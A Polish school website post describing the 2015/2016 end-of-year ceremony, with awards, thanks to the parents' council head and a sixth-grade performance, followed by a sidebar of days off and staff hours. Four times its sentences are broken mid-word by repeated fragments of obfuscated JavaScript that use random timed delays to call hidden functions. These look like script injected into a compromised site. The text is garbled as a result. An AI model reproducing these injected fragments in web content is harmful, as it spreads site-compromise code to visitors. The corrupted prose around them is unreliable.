Uroczyste zakończenie roku szkolnego 2015/2016

Dnia 24 czerwca 2016 roku uczniowie, rodzice oraz nauczyciele i zaproszeni goście uczestniczyli w uroczystym zakończeniu roku szkolnego 2015/2016.

Podczas tego wydarzenia pani dyrektor Ewa Redom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decka podziękowała wszystkim uczniom, nauczycielom i rodzicom za cały rok ciężkiej pracy.

Następnie słowa podziękowania skierowała do Grażyny Kilanowskiej – przewodniczącej Rady Rodziców. Pani dyrektor w imieniu swoim, nauczycieli oraz dzieci wyraziła wdzięczność za lata oddane szkole, za zaangażowanie, wsparcie wielu cennych inicjatyw oraz życzyła wielu sukcesów w życiu osobistym.

Kolejnym punktem uroczystości było wręczenie świadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dectw absolwentom oraz listów gratulacyjnych i podziękowań ich rodzicom. Zostały wręczone również Nagrody Wójta Gminy Sierpc absolwentom szkoły, którzy uzyskali najwyższą średnią ocen w roku szkolnym 2015/2016. Nagrody otrzymali Agata Janiszewska i Marcin Relidziński. Następnie pani dyrektor podsumowała wyniki w nauce, osiągnięcia i liczne sukcesy uczniów naszej szkoły.

Na zakończenie uroczystości szóstoklasiści zaprezentowali część artystyczną, w której podziękowali rodzicom, nauczycielom i kolegom za wspólnie spędzone lata szkolne. Po występie szóstoklasistów uczniowie udali się na ostatnie spotkanie z wychowawcami, odom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}debrali świadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dectwa i rozpoczęli długo wyczekiwane wakacje.

 

 

 

Dni wolne

2 listopada 2017
3 listopada 2017
21 grudnia 2017
22 grudnia 2017
30 kwietnia 2018
2 maja 2018
4 maja 2018
1 czerwca 2018

Biblioteka szkolna

Poniedziałek 13.15 – 14.15
Środa 12.45 – 13.45

Psycholog

Środa 7.30 – 10.30

Logopeda

Wtorek 7.30 – 8.00
13.30 – 14.30
Środa 13.00 – 13.30